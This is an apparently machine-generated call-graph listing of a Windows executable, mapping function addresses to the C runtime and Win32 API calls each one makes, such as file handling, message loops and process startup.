944e2c 95355->95356 95357 944e4e EnterCriticalSection 95355->95357 95356->95357 95358 944e34 95356->95358 95359 943ad3 95357->95359 95360 947cf4 __lock 47 API calls 95358->95360 95361 9439fe 81 API calls 4 library calls 95359->95361 95360->95359 95361->95350 95362->95352 95366 943839 95363->95366 95365 924510 95365->95108 95367 943845 _fseek 95366->95367 95368 943888 95367->95368 95369 94385b _memset 95367->95369 95370 943880 _fseek 95367->95370 95371 944e1c __lock_file 48 API calls 95368->95371 95379 947c0e 47 API calls __getptd_noexit 95369->95379 95370->95365 95373 94388e 95371->95373 95381 94365b 62 API calls 5 library calls 95373->95381 95374 943875 95380 946e10 8 API calls __cftog_l 95374->95380 95377 9438a4 95382 9438c2 LeaveCriticalSection LeaveCriticalSection _fprintf 95377->95382 95379->95374 95380->95370 95381->95377 95382->95370 95386 94344a GetSystemTimeAsFileTime 95383->95386 95385 96bdc3 95385->95110 95387 943478 __aulldiv 95386->95387 95387->95385 95389 943e71 _fseek 95388->95389 95390 943e94 95389->95390 95391 943e7f 95389->95391 95393 944e1c __lock_file 48 API calls 95390->95393 95402 947c0e 47 API calls __getptd_noexit 95391->95402 95395 943e9a 95393->95395 95394 943e84 95403 946e10 8 API calls __cftog_l 95394->95403 95404 943b0c 55 API calls 5 library calls 95395->95404 95398 943ea5 95405 943ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 95398->95405 95399 943e8f _fseek 95399->95115 95401 943eb7 95401->95399 95402->95394 95403->95399 95404->95398 95405->95401 95407 941e61 95406->95407 95410 941e55 95406->95410 95430 947c0e 47 API calls __getptd_noexit 95407->95430 95409 942019 95414 941e41 95409->95414 95431 946e10 8 API calls __cftog_l 95409->95431 95410->95407 95421 941ed4 95410->95421 95425 949d6b 47 API calls __cftog_l 95410->95425 95413 941fa0 95413->95407 95413->95414 95416 941fb0 95413->95416 95414->94954 95415 941f5f 95415->95407 95417 941f7b 95415->95417 95427 949d6b 47 API calls __cftog_l 95415->95427 95429 949d6b 47 API calls __cftog_l 95416->95429 95417->95407 95417->95414 95420 941f91 95417->95420 95428 949d6b 47 API calls __cftog_l 95420->95428 95421->95407 95424 941f41 95421->95424 95426 949d6b 47 API calls __cftog_l 95421->95426 95424->95413 95424->95415 95425->95421 95426->95424 95427->95417 95428->95414 95429->95414 95430->95409 95431->95414 95432->95051 95434 942aba _fseek 95433->95434 95435 942ad4 95434->95435 95436 942aec 95434->95436 95438 942ae4 _fseek 95434->95438 95511 947c0e 47 API calls __getptd_noexit 95435->95511 95439 944e1c __lock_file 48 API calls 95436->95439 95438->95058 95441 942af2 95439->95441 95440 942ad9 95512 946e10 8 API calls __cftog_l 95440->95512 95499 942957 95441->95499 95447 9435f0 _fseek 95446->95447 95448 943604 95447->95448 95449 94361c 95447->95449 95689 947c0e 47 API calls __getptd_noexit 95448->95689 95451 944e1c __lock_file 48 API calls 95449->95451 95455 943614 _fseek 95449->95455 95453 94362e 95451->95453 95452 943609 95690 946e10 8 API calls __cftog_l 95452->95690 95673 943578 95453->95673 95455->95054 95460 96c715 95459->95460 95461 96c6ff SetFileTime CloseHandle 95459->95461 95460->95032 95461->95460 95467 96c581 __tzset_nolock _wcscmp 95462->95467 95463 96c05f 95463->95029 95463->95032 95464 9244ed 64 API calls 95464->95467 95465 96bf5a GetSystemTimeAsFileTime 95465->95467 95466 924517 83 API calls 95466->95467 95467->95463 95467->95464 95467->95465 95467->95466 95469 96b970 95468->95469 95470 96b97e 95468->95470 95471 943499 117 API calls 95469->95471 95472 96b9c3 95470->95472 95473 943499 117 API calls 95470->95473 95494 96b987 95470->95494 95471->95470 95763 96bbe8 64 API calls 3 library calls 95472->95763 95475 96b9a8 95473->95475 95475->95472 95477 96b9b1 95475->95477 95476 96ba07 95478 96ba2c 95476->95478 95479 96ba0b 95476->95479 95482 9435e4 __fcloseall 83 API calls 95477->95482 95477->95494 95764 96b7e5 47 API calls __crtGetStringTypeA_stat 95478->95764 95481 96ba18 95479->95481 95484 9435e4 __fcloseall 83 API calls 95479->95484 95487 9435e4 __fcloseall 83 API calls 95481->95487 95481->95494 95482->95494 95483 96ba34 95485 96ba5a 95483->95485 95486 96ba3a 95483->95486 95484->95481 95765 96ba8a 90 API calls 95485->95765 95488 96ba47 95486->95488 95490 9435e4 __fcloseall 83 API calls 95486->95490 95487->95494 95492 9435e4 __fcloseall 83 API calls 95488->95492 95488->95494 95490->95488 95491 96ba61 95766 96bb64 95491->95766 95492->95494 95494->95062 95496 96ba75 95496->95494 95498 9435e4 __fcloseall 83 API calls 95496->95498 95497 9435e4 __fcloseall 83 API calls 95497->95496 95498->95494 95500 942984 95499->95500 95502 942966 95499->95502 95513 942b24 LeaveCriticalSection LeaveCriticalSection _fprintf 95500->95513 95501 942974 95546 947c0e 47 API calls __getptd_noexit 95501->95546 95502->95500 95502->95501 95506 94299c _memcpy_s 95502->95506 95504 942979 95547 946e10 8 API calls __cftog_l 95504->95547 95506->95500 95514 942933 95506->95514 95521 94af61 95506->95521 95548 942c84 95506->95548 95554 948e63 78 API calls 5 library calls 95506->95554 95511->95440 95512->95438 95513->95438 95515 942952 95514->95515 95516 94293d 95514->95516 95515->95506 95555 947c0e 47 API calls __getptd_noexit 95516->95555 95518 942942 95556 946e10 8 API calls __cftog_l 95518->95556 95520 94294d 95520->95506 95522 94af6d _fseek 95521->95522 95523 94af75 95522->95523 95524 94af8d 95522->95524 95630 947bda 47 API calls __getptd_noexit 95523->95630 95526 94b022 95524->95526 95530 94afbf 95524->95530 95635 947bda 47 API calls __getptd_noexit 95526->95635 95527 94af7a 95631 947c0e 47 API calls __getptd_noexit 95527->95631 95557 94a8ed 95530->95557 95531 94b027 95636 947c0e 47 API calls __getptd_noexit 95531->95636 95534 94afc5 95536 94afd8 95534->95536 95537 94afeb 95534->95537 95535 94b02f 95637 946e10 8 API calls __cftog_l 95535->95637 95566 94b043 95536->95566 95632 947c0e 47 API calls __getptd_noexit 95537->95632 95540 94af82 _fseek 95540->95506 95542 94afe4 95634 94b01a LeaveCriticalSection __unlock_fhandle 95542->95634 95543 94aff0 95633 947bda 47 API calls __getptd_noexit 95543->95633 95546->95504 95547->95500 95549 942cbb 95548->95549 95550 942c97 95548->95550 95549->95506 95550->95549 95551 942933 __flush 47 API calls 95550->95551 95552 942cb4 95551->95552 95553 94af61 __flush 78 API calls 95552->95553 95553->95549 95554->95506 95555->95518 95556->95520 95558 94a8f9 _fseek 95557->95558 95559 94a946 EnterCriticalSection 95558->95559 95560 947cf4 __lock 47 API calls 95558->95560 95561 94a96c _fseek 95559->95561 95562 94a91d 95560->95562 95561->95534 95563 94a928 InitializeCriticalSectionAndSpinCount 95562->95563 95564 94a93a 95562->95564 95563->95564 95638 94a970 LeaveCriticalSection _doexit 95564->95638 95567 94b050 __ftell_nolock 95566->95567 95568 94b0ac 95567->95568 95569 94b08d 95567->95569 95600 94b082 95567->95600 95573 94b105 95568->95573 95574 94b0e9 95568->95574 95648 947bda 47 API calls __getptd_noexit 95569->95648 95572 94b092 95649 947c0e 47 API calls __getptd_noexit 95572->95649 95577 94b11c 95573->95577 95654 94f82f 49 API calls 3 library calls 95573->95654 95651 947bda 47 API calls __getptd_noexit 95574->95651 95575 94b86b 95575->95542 95639 953bf2 95577->95639 95579 94b099 95650 946e10 8 API calls __cftog_l 95579->95650 95582 94b0ee 95652 947c0e 47 API calls __getptd_noexit 95582->95652 95584 94b12a 95586 94b44b 95584->95586 95655 947a0d 47 API calls 2 library calls 95584->95655 95588 94b463 95586->95588 95589 94b7b8 WriteFile 95586->95589 95587 94b0f5 95653 946e10 8 API calls __cftog_l 95587->95653 95594 94b479 95588->95594 95595 94b55a 95588->95595 95591 94b410 95589->95591 95592 94b7e1 GetLastError 95589->95592 95599 94b81b 95591->95599 95591->95600 95607 94b7f7 95591->95607 95592->95591 95594->95599 95597 94b663 95595->95597 95597->95599 95598 94b150 GetConsoleMode 95598->95586 95602 94b189 95598->95602 95599->95600 95662 94a70c 95600->95662 95602->95586 95603 94b199 GetConsoleCP 95602->95603 95603->95591 95630->95527 95631->95540 95632->95543 95633->95542 95634->95540 95635->95531 95636->95535 95637->95540 95638->95559 95640 953bfd 95639->95640 95642 953c0a 95639->95642 95669 947c0e 47 API calls __getptd_noexit 95640->95669 95644 953c16 95642->95644 95670 947c0e 47 API calls __getptd_noexit 95642->95670 95643 953c02 95643->95584 95644->95584 95646 953c37 95671 946e10 8 API calls __cftog_l 95646->95671 95648->95572 95649->95579 95650->95600 95651->95582 95652->95587 95653->95600 95654->95577 95655->95598 95663 94a714 95662->95663 95664 94a716 IsProcessorFeaturePresent 95662->95664 95663->95575 95666 9537b0 95664->95666 95672 95375f 5 API calls 2 library calls 95666->95672 95668 953893 95668->95575 95669->95643 95670->95646 95671->95643 95672->95668 95674 943587 95673->95674 95675 94359b 95673->95675 95719 947c0e 47 API calls __getptd_noexit 95674->95719 95677 943597 95675->95677 95679 942c84 __flush 78 API calls 95675->95679 95691 943653 LeaveCriticalSection LeaveCriticalSection _fprintf 95677->95691 95678 94358c 95720 946e10 8 API calls __cftog_l 95678->95720 95681 9435a7 95679->95681 95692 94eb36 95681->95692 95684 942933 __flush 47 API calls 95685 9435b5 95684->95685 95696 94e9d2 95685->95696 95687 9435bb 95687->95677 95688 941c9d _free 47 API calls 95687->95688 95688->95677 95689->95452 95690->95455 95691->95455 95693 9435af 95692->95693 95694 94eb43 95692->95694 95693->95684 95694->95693 95695 941c9d _free 47 API calls 95694->95695 95695->95693 95697 94e9de _fseek 95696->95697 95698 94e9e6 95697->95698 95699 94e9fe 95697->95699 95736 947bda 47 API calls __getptd_noexit 95698->95736 95701 94ea7b 95699->95701 95704 94ea28 95699->95704 95740 947bda 47 API calls __getptd_noexit 95701->95740 95702 94e9eb 95737 947c0e 47 API calls __getptd_noexit 95702->95737 95708 94a8ed ___lock_fhandle 49 API calls 95704->95708 95706 94ea80 95741 947c0e 47 API calls __getptd_noexit 95706->95741 95711 94ea2e 95708->95711 95709 94e9f3 _fseek 95709->95687 95710 94ea88 95742 946e10 8 API calls __cftog_l 95710->95742 95713 94ea41 95711->95713 95714 94ea4c 95711->95714 95721 94ea9c 95713->95721 95738 947c0e 47 API calls __getptd_noexit 95714->95738 95717 94ea47 95739 94ea73 LeaveCriticalSection __unlock_fhandle 95717->95739 95719->95678 95720->95677 95743 94aba4 95721->95743 95723 94eb00 95756 94ab1e 48 API calls 2 library calls 95723->95756 95725 94eaaa 95725->95723 95726 94eade 95725->95726 95728 94aba4 __lseeki64_nolock 47 API calls 95725->95728 95726->95723 95729 94aba4 __lseeki64_nolock 47 API calls 95726->95729 95727 94eb08 95730 94eb2a 95727->95730 95757 947bed 47 API calls 2 library calls 95727->95757 95731 94ead5 95728->95731 95732 94eaea CloseHandle 95729->95732 95730->95717 95734 94aba4 __lseeki64_nolock 47 API calls 95731->95734 95732->95723 95735 94eaf6 GetLastError 95732->95735 95734->95726 95735->95723 95736->95702 95737->95709 95738->95717 95739->95709 95740->95706 95741->95710 95742->95709 95744 94abc4 95743->95744 95745 94abaf 95743->95745 95750 94abe9 95744->95750 95760 947bda 47 API calls __getptd_noexit 95744->95760 95758 947bda 47 API calls __getptd_noexit 95745->95758 95747 94abb4 95759 947c0e 47 API calls __getptd_noexit 95747->95759 95750->95725 95751 94abf3 95761 947c0e 47 API calls __getptd_noexit 95751->95761 95752 94abbc 95752->95725 95754 94abfb 95762 946e10 8 API calls __cftog_l 95754->95762 95756->95727 95757->95730 95758->95747 95759->95752 95760->95751 95761->95754 95762->95752 95763->95476 95764->95483 95765->95491 95767 96bb71 95766->95767 95768 96bb77 95766->95768 95769 941c9d _free 47 API calls 95767->95769 95770 941c9d _free 47 API calls 95768->95770 95771 96bb88 95768->95771 95769->95768 95770->95771 95772 96ba68 95771->95772 95773 941c9d _free 47 API calls 95771->95773 95772->95496 95772->95497 95773->95772 95775 966529 95774->95775 95776 966cc4 FindFirstFileW 95774->95776 95775->94889 95776->95775 95777 966cd9 FindClose 95776->95777 95777->95775 95779 92bd3f 95778->95779 95782 92bd5a 95778->95782 95780 92bdfa 48 API calls 95779->95780 95781 92bd47 CharUpperBuffW 95780->95781 95781->95782 95782->94902 95784 99436a 95783->95784 95785 922b8b 95783->95785 95786 93f4ea 48 API calls 95785->95786 95787 922b92 95786->95787 95788 922bb3 95787->95788 95861 922bce 48 API calls 95787->95861 95788->94908 95791 92e8f6 95790->95791 95808 92e906 Mailbox 95790->95808 95792 92ed52 95791->95792 95791->95808 95945 93e3cd 331 API calls 95792->95945 95793 96cc5c 86 API calls 95793->95808 95794 92ebc7 95796 92ebdd 95794->95796 95946 922ff6 16 API calls 95794->95946 95796->94908 95798 92ed63 95798->95796 95800 92ed70 95798->95800 95799 92e94c PeekMessageW 95799->95808 95947 93e312 331 API calls Mailbox 95800->95947 95802 99526e Sleep 95802->95808 95803 92ed77 LockWindowUpdate DestroyWindow GetMessageW 95803->95796 95804 92eda9 95803->95804 95806 9959ef TranslateMessage DispatchMessageW GetMessageW 95804->95806 95806->95806 95811 995a1f 95806->95811 95808->95793 95808->95794 95808->95799 95808->95802 95809 92ed21 PeekMessageW 95808->95809 95810 921caa 49 API calls 95808->95810 95812 92ebf7 timeGetTime 95808->95812 95814 93f4ea 48 API calls 95808->95814 95815 926eed 48 API calls 95808->95815 95816 92ed3a TranslateMessage DispatchMessageW 95808->95816 95817 995557 WaitForSingleObject 95808->95817 95820 99588f Sleep 95808->95820 95821 92edae timeGetTime 95808->95821 95824 995733 Sleep 95808->95824 95826 922aae 307 API calls 95808->95826 95832 995445 Sleep 95808->95832 95842 92fe30 307 API calls 95808->95842 95844 9345e0 307 API calls 95808->95844 95845 933200 307 API calls 95808->95845 95847 995429 Mailbox 95808->95847 95849 92ce19 48 API calls 95808->95849 95850 92d6e9 55 API calls 95808->95850 95862 92ef00 95808->95862 95869 92f110 95808->95869 95934 93e244 95808->95934 95939 93dc5f 95808->95939 95944 92eed0 331 API calls Mailbox 95808->95944 95949 988d23 48 API calls 95808->95949 95809->95808 95810->95808 95811->95796 95812->95808 95814->95808 95815->95808 95816->95809 95817->95808 95818 995574 GetExitCodeProcess CloseHandle 95817->95818 95818->95808 95819 92d7f7 48 API calls 95819->95847 95820->95847 95948 921caa 49 API calls 95821->95948 95824->95847 95826->95808 95828 93dc38 timeGetTime 95828->95847 95829 995926 GetExitCodeProcess 95830 99593c WaitForSingleObject 95829->95830 95831 995952 CloseHandle 95829->95831 95830->95808 95830->95831 95831->95847 95832->95808 95833 988c4b 108 API calls 95833->95847 95834 922c79 107 API calls 95834->95847 95836 995432 Sleep 95836->95832 95837 9959ae Sleep 95837->95808 95839 92ce19 48 API calls 95839->95847 95842->95808 95843 92d6e9 55 API calls 95843->95847 95844->95808 95845->95808 95847->95808 95847->95819 95847->95828 95847->95829 95847->95832 95847->95833 95847->95834 95847->95836 95847->95837 95847->95839 95847->95843 95950 964cbe 49 API calls Mailbox 95847->95950 95951 921caa 49 API calls 95847->95951 95952 922aae 331 API calls 95847->95952 95953 97ccb2 50 API calls 95847->95953 95954 967a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 95847->95954 95955 966532 63 API calls 3 library calls 95847->95955 95849->95808 95850->95808 95851->94908 95852->94908 95853->94908 95854->94908 95855->94908 95856->94908 95857->94908 95858->94908 95859->94908 95860->94908 95861->95788 95863 92ef2f 95862->95863 95864 92ef1d 95862->95864 95957 96cc5c 86 API calls 4 library calls 95863->95957 95956 92e3b0 331 API calls 2 library calls 95864->95956 95866 92ef26 95866->95808 95868 9986f9 95868->95868 95870 92f130 95869->95870 95873 92fe30 331 API calls 95870->95873 95878 92f199 95870->95878 95871 92f3dd 95874 9987c8 95871->95874 95884 92f3f2 95871->95884 95921 92f431 Mailbox 95871->95921 95872 92f595 95879 92d7f7 48 API calls 95872->95879 95872->95921 95875 998728 95873->95875 95962 96cc5c 86 API calls 4 library calls 95874->95962 95875->95878 95959 96cc5c 86 API calls 4 library calls 95875->95959 95876 92fe30 331 API calls 95876->95921 95878->95871 95878->95872 95882 92d7f7 48 API calls 95878->95882 95912 92f229 95878->95912 95881 9987a3 95879->95881 95961 940f0a 52 API calls __cinit 95881->95961 95886 998772 95882->95886 95911 92f418 95884->95911 95963 969af1 48 API calls 95884->95963 95885 998b1b 95902 998b2c 95885->95902 95903 998bcf 95885->95903 95960 940f0a 52 API calls __cinit 95886->95960 95888 92f770 95892 998a45 95888->95892 95909 92f77a 95888->95909 95890 92d6e9 55 API calls 95890->95921 95891 998b7e 95972 97e40a 331 API calls Mailbox 95891->95972 95969 93c1af 48 API calls 95892->95969 95893 998c53 95977 96cc5c 86 API calls 4 library calls 95893->95977 95894 998810 95964 97eef8 331 API calls 95894->95964 95895 92fe30 331 API calls 95914 92f6aa 95895->95914 95896 998beb 95975 97bdbd 331 API calls Mailbox 95896->95975 95971 97f5ee 331 API calls 95902->95971 95974 96cc5c 86 API calls 4 library calls 95903->95974 95906 931b90 48 API calls 95906->95921 95907 931b90 48 API calls 95907->95921 95909->95906 95910 998c00 95933 92f537 Mailbox 95910->95933 95976 96cc5c 86 API calls 4 library calls 95910->95976 95911->95885 95911->95914 95911->95921 95912->95871 95912->95872 95912->95911 95912->95921 95913 92fce0 95913->95933 95973 96cc5c 86 API calls 4 library calls 95913->95973 95914->95888 95914->95895 95914->95913 95914->95921 95914->95933 95916 998823 95916->95911 95920 99884b 95916->95920 95919 96cc5c 86 API calls 95919->95921 95965 97ccdc 48 API calls 95920->95965 95921->95876 95921->95890 95921->95891 95921->95893 95921->95896 95921->95907 95921->95913 95921->95919 95921->95933 95958 92dd47 48 API calls _memcpy_s 95921->95958 95970 9597ed InterlockedDecrement 95921->95970 95978 93c1af 48 API calls 95921->95978 95923 998857 95925 9988aa 95923->95925 95926 998865 95923->95926 95930 9988a0 Mailbox 95925->95930 95967 96a69d 48 API calls 95925->95967 95966 969b72 48 API calls 95926->95966 95927 92fe30 331 API calls 95927->95933 95930->95927 95931 9988e7 95968 92bc74 48 API calls 95931->95968 95933->95808 95936 93e253 95934->95936 95937 99df42 95934->95937 95935 99df77 95936->95808 95937->95935 95938 99df59 TranslateAcceleratorW 95937->95938 95938->95936 95940 93dca3 95939->95940 95942 93dc71 95939->95942 95940->95808 95941 93dc96 IsDialogMessageW 95941->95940 95941->95942 95942->95940 95942->95941 95943 99dd1d GetClassLongW 95942->95943 95943->95941 95943->95942 95944->95808 95945->95794 95946->95798 95947->95803 95948->95808 95949->95808 95950->95847 95951->95847 95952->95847 95953->95847 95954->95847 95955->95847 95956->95866 95957->95868 95958->95921 95959->95878 95960->95912 95961->95921 95962->95933 95963->95894 95964->95916 95965->95923 95966->95930 95967->95931 95968->95930 95969->95921 95970->95921 95971->95921 95972->95913 95973->95933 95974->95933 95975->95910 95976->95933 95977->95933 95978->95921 95979 945dfd 95980 945e09 _fseek 95979->95980 96016 947eeb GetStartupInfoW 95980->96016 95983 945e0e 96018 949ca7 GetProcessHeap 95983->96018 95984 945e66 95985 945e71 95984->95985 96103 945f4d 47 API calls 3 library calls 95984->96103 96019 947b47 95985->96019 95988 945e77 95989 945e82 __RTC_Initialize 95988->95989 96104 945f4d 47 API calls 3 library calls 95988->96104 96040 94acb3 95989->96040 95992 945e91 95993 945e9d GetCommandLineW 95992->95993 96105 945f4d 47 API calls 3 library calls 95992->96105 96059 952e7d GetEnvironmentStringsW 95993->96059 95996 945e9c 95996->95993 96000 945ec2 96072 952cb4 96000->96072 96003 945ec8 96004 945ed3 96003->96004 96107 94115b 47 API calls 3 library calls 96003->96107 96086 941195 96004->96086 96007 945edb 96008 945ee6 __wwincmdln 96007->96008 96108 94115b 47 API calls 3 library calls 96007->96108 96090 923a0f 96008->96090 96011 945efa 96012 945f09 96011->96012 96109 9413f1 47 API calls _doexit 96011->96109 96110 941186 47 API calls _doexit 96012->96110 96015 945f0e _fseek 96017 947f01 96016->96017 96017->95983 96018->95984 96111 94123a 30 API calls 2 library calls 96019->96111 96021 947b4c 96112 947e23 InitializeCriticalSectionAndSpinCount 96021->96112 96023 947b51 96024 947b55 96023->96024 96114 947e6d TlsAlloc 96023->96114 96113 947bbd 50 API calls 2 library calls 96024->96113 96027 947b5a 96027->95988 96028 947b67 96028->96024 96029 947b72 96028->96029 96115 946986 96029->96115 96032 947bb4 96123 947bbd 50 API calls 2 library calls 96032->96123 96035 947b93 96035->96032 96037 947b99 96035->96037 96036 947bb9 96036->95988 96122 947a94 47 API calls 4 library calls 96037->96122 96039 947ba1 GetCurrentThreadId 96039->95988 96041 94acbf _fseek 96040->96041 96042 947cf4 __lock 47 API calls 96041->96042 96043 94acc6 96042->96043 96044 946986 __calloc_crt 47 API calls 96043->96044 96045 94acd7 96044->96045 96046 94ad42 GetStartupInfoW 96045->96046 96047 94ace2 _fseek @_EH4_CallFilterFunc@8 96045->96047 96054 94ae80 96046->96054 96056 94ad57 96046->96056 96047->95992 96048 94af44 96132 94af58 LeaveCriticalSection _doexit 96048->96132 96050 94aec9 GetStdHandle 96050->96054 96051 946986 __calloc_crt 47 API calls 96051->96056 96052 94aedb GetFileType 96052->96054 96053 94ada5 96053->96054 96057 94ade5 InitializeCriticalSectionAndSpinCount 96053->96057 96058 94add7 GetFileType 96053->96058 96054->96048 96054->96050 96054->96052 96055 94af08 InitializeCriticalSectionAndSpinCount 96054->96055 96055->96054 96056->96051 96056->96053 96056->96054 96057->96053 96058->96053 96058->96057 96060 945ead 96059->96060 96061 952e8e 96059->96061 96066 952a7b GetModuleFileNameW 96060->96066 96133 9469d0 47 API calls __crtGetStringTypeA_stat 96061->96133 96064 952eb4 _memcpy_s 96065 952eca FreeEnvironmentStringsW 96064->96065 96065->96060 96067 952aaf _wparse_cmdline 96066->96067 96068 945eb7 96067->96068 96069 952ae9 96067->96069 96068->96000 96106 94115b 47 API calls 3 library calls 96068->96106 96134 9469d0 47 API calls __crtGetStringTypeA_stat 96069->96134 96071 952aef _wparse_cmdline 96071->96068 96073 952ccd __wsetenvp 96072->96073 96077 952cc5 96072->96077 96074 946986 __calloc_crt 47 API calls 96073->96074 96082 952cf6 __wsetenvp 96074->96082 96075 952d4d 96076 941c9d _free 47 API calls 96075->96076 96076->96077 96077->96003 96078 946986 __calloc_crt 47 API calls 96078->96082 96079 952d72 96080 941c9d _free 47 API calls 96079->96080 96080->96077 96082->96075 96082->96077 96082->96078 96082->96079 96083 952d89 96082->96083 96135 952567 47 API calls __cftog_l 96082->96135 96136 946e20 IsProcessorFeaturePresent 96083->96136 96085 952d95 96085->96003 96087 9411a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 96086->96087 96089 9411e0 __IsNonwritableInCurrentImage 96087->96089 96151 940f0a 52 API calls __cinit 96087->96151 96089->96007 96091 991ebf 96090->96091 96092 923a29 96090->96092 96093 923a63 IsThemeActive 96092->96093 96152 941405 96093->96152 96097 923a8f 96164 923adb SystemParametersInfoW SystemParametersInfoW 96097->96164 96099 923a9b 96165 923d19 96099->96165 96101 923aa3 SystemParametersInfoW 96102 923ac8 96101->96102 96102->96011 96103->95985 96104->95989 96105->95996 96109->96012 96110->96015 96111->96021 96112->96023 96113->96027 96114->96028 96117 94698d 96115->96117 96118 9469ca 96117->96118 96119 9469ab Sleep 96117->96119 96124 9530aa 96117->96124 96118->96032 96121 947ec9 TlsSetValue 96118->96121 96120 9469c2 96119->96120 96120->96117 96120->96118 96121->96035 96122->96039 96123->96036 96125 9530b5 96124->96125 96130 9530d0 __calloc_impl 96124->96130 96126 9530c1 96125->96126 96125->96130 96131 947c0e 47 API calls __getptd_noexit 96126->96131 96128 9530e0 HeapAlloc 96129 9530c6 96128->96129 96128->96130 96129->96117 96130->96128 96130->96129 96131->96129 96132->96047 96133->96064 96134->96071 96135->96082 96137 946e2b 96136->96137 96142 946cb5 96137->96142 96141 946e46 96141->96085 96143 946ccf _memset __call_reportfault 96142->96143 96144 946cef IsDebuggerPresent 96143->96144 96150 9481ac SetUnhandledExceptionFilter UnhandledExceptionFilter 96144->96150 96146 94a70c __cftog_l 6 API calls 96148 946dd6 96146->96148 96147 946db3 __call_reportfault 96147->96146 96149 948197 GetCurrentProcess TerminateProcess 96148->96149 96149->96141 96150->96147 96151->96089 96153 947cf4 __lock 47 API calls 96152->96153 96154 941410 96153->96154 96217 947e58 LeaveCriticalSection 96154->96217 96156 923a88 96157 94146d 96156->96157 96158 941477 96157->96158 96159 941491 96157->96159 96158->96159 96218 947c0e 47 API calls __getptd_noexit 96158->96218 96159->96097 96161 941481 96219 946e10 8 API calls __cftog_l 96161->96219 96163 94148c 96163->96097 96164->96099 96166 923d26 __ftell_nolock 96165->96166 96167 92d7f7 48 API calls 96166->96167 96168 923d31 GetCurrentDirectoryW 96167->96168 96220 9261ca 96168->96220 96170 923d57 IsDebuggerPresent 96171 923d65 96170->96171 96172 991cc1 MessageBoxA 96170->96172 96173 991cd9 96171->96173 96174 923d82 96171->96174 96204 923e3a 96171->96204 96172->96173 96335 93c682 48 API calls 96173->96335 96294 9240e5 96174->96294 96175 923e41 SetCurrentDirectoryW 96178 923e4e Mailbox 96175->96178 96178->96101 96179 991ce9 96184 991cff SetCurrentDirectoryW 96179->96184 96184->96178 96204->96175 96217->96156 96218->96161 96219->96163 96337 93e99b 96220->96337 96224 9261eb 96225 925374 50 API calls 96224->96225 96226 9261ff 96225->96226 96227 92ce19 48 API calls 96226->96227 96228 92620c 96227->96228 96354 9239db 96228->96354 96230 926216 Mailbox 96231 926eed 48 API calls 96230->96231 96232 92622b 96231->96232 96366 929048 96232->96366 96235 92ce19 48 API calls 96236 926244 96235->96236 96237 92d6e9 55 API calls 96236->96237 96238 926254 Mailbox 96237->96238 96239 92ce19 48 API calls 96238->96239 96240 92627c 96239->96240 96241 92d6e9 55 API calls 96240->96241 96242 92628f Mailbox 96241->96242 96243 92ce19 48 API calls 96242->96243 96244 9262a0 96243->96244 96245 92d645 53 API calls 96244->96245 96246 9262b2 Mailbox 96245->96246 96247 92d7f7 48 API calls 96246->96247 96248 9262c5 96247->96248 96369 9263fc 96248->96369 96252 9262df 96253 991c08 96252->96253 96254 9262e9 96252->96254 96256 9263fc 48 API calls 96253->96256 96255 940fa7 _W_store_winword 59 API calls 96254->96255 96257 9262f4 96255->96257 96258 991c1c 96256->96258 96257->96258 96259 9262fe 96257->96259 96260 9263fc 48 API calls 96258->96260 96261 940fa7 _W_store_winword 59 API calls 96259->96261 96262 991c38 96260->96262 96263 926309 96261->96263 96265 925374 50 API calls 96262->96265 96263->96262 96264 926313 96263->96264 96266 940fa7 _W_store_winword 59 API calls 96264->96266 96267 991c5d 96265->96267 96268 92631e 96266->96268 96269 9263fc 48 API calls 96267->96269 96270 92635f 96268->96270 96271 991c86 96268->96271 96274 9263fc 48 API calls 96268->96274 96273 991c69 96269->96273 96270->96271 96272 92636c 96270->96272 96275 926eed 48 API calls 96271->96275 96279 93c050 48 API calls 96272->96279 96276 926eed 48 API calls 96273->96276 96277 926342 96274->96277 96278 991ca8 96275->96278 96280 991c77 96276->96280 96281 926eed 48 API calls 96277->96281 96282 9263fc 48 API calls 96278->96282 96283 926384 96279->96283 96284 9263fc 48 API calls 96280->96284 96285 926350 96281->96285 96286 991cb5 96282->96286 96287 931b90 48 API calls 96283->96287 96284->96271 96288 9263fc 48 API calls 96285->96288 96286->96286 96291 926394 96287->96291 96288->96270 96289 931b90 48 API calls 96289->96291 96291->96289 96292 9263fc 48 API calls 96291->96292 96293 9263d6 Mailbox 96291->96293 96385 926b68 48 API calls 96291->96385 96292->96291 96293->96170 96295 9240f2 __ftell_nolock 96294->96295 96296 99370e _memset 96295->96296 96297 92410b 96295->96297 96300 99372a GetOpenFileNameW 96296->96300 96298 92660f 49 API calls 96297->96298 96299 924114 96298->96299 96427 9240a7 96299->96427 96302 993779 96300->96302 96304 926a63 48 API calls 96302->96304 96306 99378e 96304->96306 96306->96306 96335->96179 96338 92d7f7 48 API calls 96337->96338 96339 9261db 96338->96339 96340 926009 96339->96340 96341 926016 __ftell_nolock 96340->96341 96342 926a63 48 API calls 96341->96342 96347 92617c Mailbox 96341->96347 96344 926048 96342->96344 96350 92607e Mailbox 96344->96350 96386 9261a6 96344->96386 96345 92614f 96346 92ce19 48 API calls 96345->96346 96345->96347 96349 926170 96346->96349 96347->96224 96348 92ce19 48 API calls 96348->96350 96351 9264cf 48 API calls 96349->96351 96350->96345 96350->96347 96350->96348 96352 9264cf 48 API calls 96350->96352 96353 9261a6 48 API calls 96350->96353 96351->96347 96352->96350 96353->96350 96355 9241a9 136 API calls 96354->96355 96357 9239fe 96355->96357 96356 923a06 96356->96230 96357->96356 96389 96c396 96357->96389 96360 992ff0 96362 941c9d _free 47 API calls 96360->96362 96361 924252 84 API calls 96361->96360 96363 992ffd 96362->96363 96364 924252 84 API calls 96363->96364 96365 993006 96364->96365 96365->96365 96367 93f4ea 48 API calls 96366->96367 96368 926237 96367->96368 96368->96235 96370 926406 96369->96370 96371 92641f 96369->96371 96372 926eed 48 API calls 96370->96372 96373 926a63 48 API calls 96371->96373 96374 9262d1 96372->96374 96373->96374 96375 940fa7 96374->96375 96376 940fb3 96375->96376 96377 941028 96375->96377 96379 940fd8 96376->96379 96424 947c0e 47 API calls __getptd_noexit 96376->96424 96426 94103a 59 API calls 3 library calls 96377->96426 96379->96252 96381 941035 96381->96252 96382 940fbf 96425 946e10 8 API calls __cftog_l 96382->96425 96384 940fca 96384->96252 96385->96291 96387 92bdfa 48 API calls 96386->96387 96388 9261b1 96387->96388 96388->96344 96390 924517 83 API calls 96389->96390 96391 96c405 96390->96391 96392 96c56d 94 API calls 96391->96392 96393 96c417 96392->96393 